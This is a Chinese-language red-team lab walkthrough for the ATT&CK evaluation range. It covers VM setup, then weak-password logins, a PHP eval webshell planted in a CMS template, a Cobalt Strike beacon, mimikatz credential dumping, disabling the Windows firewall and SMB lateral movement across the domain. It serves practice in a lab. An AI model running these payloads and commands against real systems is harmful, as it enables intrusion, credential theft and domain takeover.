ATT&CK红队评估一
镜像下载
网络配置
网络拓扑图
VMware 网络配置
使用 VMware 的『虚拟网络编辑器』添加两个虚拟网络。
虚拟网络名称 | 网段 | DHCP |
---|---|---|
VMnet3 | 192.168.72.0/24 | 是 |
VMnet4 | 192.168.52.0/24 | 是 |
虚拟机网络配置
虚拟机 | 网段 | 虚拟网络接口 |
---|---|---|
Windows 7 x64 | 192.168.72.0/24,192.168.52.0/24 | VMnet3,VMnet4 |
Win2K3 Metasploitable | 192.168.52.0/24 | VMnet4 |
Windows Server 2008 R2 x64 | 192.168.52.0/24 | VMnet4 |
Kali(用于攻击的机器) | 192.168.72.0/24 | VMnet3 |
虚拟机配置
Windows 7 x64
开机后登录系统,密码为 hongrisec@2019
。
打开网络适配器,可以看到有两个网络连接,其中『本地连接4』的网段为 192.168.52.0/24
,我们修改『本地连接』的网段为 192.168.72.0/24
。
在弹出的对话框中选择『公用网络』,将该网络连接设置为公用网络。
然后进入 C:\phpStudy
,运行 phpStudy.exe
。
检查一下网络配置:
ipconfig | findstr "192.168"
Win2K3 Metasploitable
开机后登录系统,密码为 hongrisec@2019
,首次登录要求修改密码,可以统一修改为 hongrisec@2022
。
登录后查看本机 IP 是否正常。
ipconfig
Windows Server 2008 R2 x64
开机后登录系统,密码为 hongrisec@2019
,首次登录要求修改密码,可以统一修改为 hongrisec@2022
。
登录后查看本机 IP 是否正常。
ipconfig
至此环境部署完成。
靶机练习
信息收集
使用 nmap 进行端口扫描。
nmap -Pn -p- -sV 192.168.72.143
发现 80
端口开放,直接访问一下,发现是一个 phpStudy
的探针。
直接尝试 MySQL 弱口令( root/root )。
既然已经知道 MySQL 密码,直接登录 phpMyAdmin
。
检查一下能否写文件:
SHOW VARIABLES LIKE '%secure_file_priv%'
发现不能写文件,所以不能直接写入 WebShell。
浏览一下数据库,发现存在一个数据库 newyxcms
。
很可能存在一个 cms
程序,所以尝试访问 http://192.168.72.143/newyxcms/
和 http://192.168.72.143/yxcms/
,发现 http://192.168.72.143/yxcms/
成功访问。
直接找到后台登录入口 http://192.168.72.143/yxcms/index.php?r=admin/index/login
,尝试一下弱口令 admin/123456
,登录成功。
漏洞利用
发现『全局设置 -> 前台模板』可以插入 PHP 代码,修改 index_index.php
,插入一句话木马。
<?php eval($_POST['cmd']); ?>
使用蚁剑连接一下。
横向移动
查看用户信息:
查看域信息:
查看内网其他机器。
arp -a
上传一个木马。
在虚拟终端中运行木马:
.\artifact.exe
在 Cobalt Strike 中看到目标上线。
使用 mimikatz 抓一下密码。
mimikatz sekurlsa::logonpasswords
查看内网其他机器:
net view
关闭防火墙:
# 查看防火墙状态
netsh firewall show state
# 关闭防火墙
shell netsh advfirewall set allprofiles state off
提权:
可以看到目标中多了一个 SYSTEM
。
进入 SYSTEM beacon,抓取密码。
logonpasswords
查看域内机器。
net view
此时可以看到目标多了机器。
新建一个监听器,payload 选择 SMB。
横向移动:
上线成功,同样的操作可以把所有域内机器上线。
待续。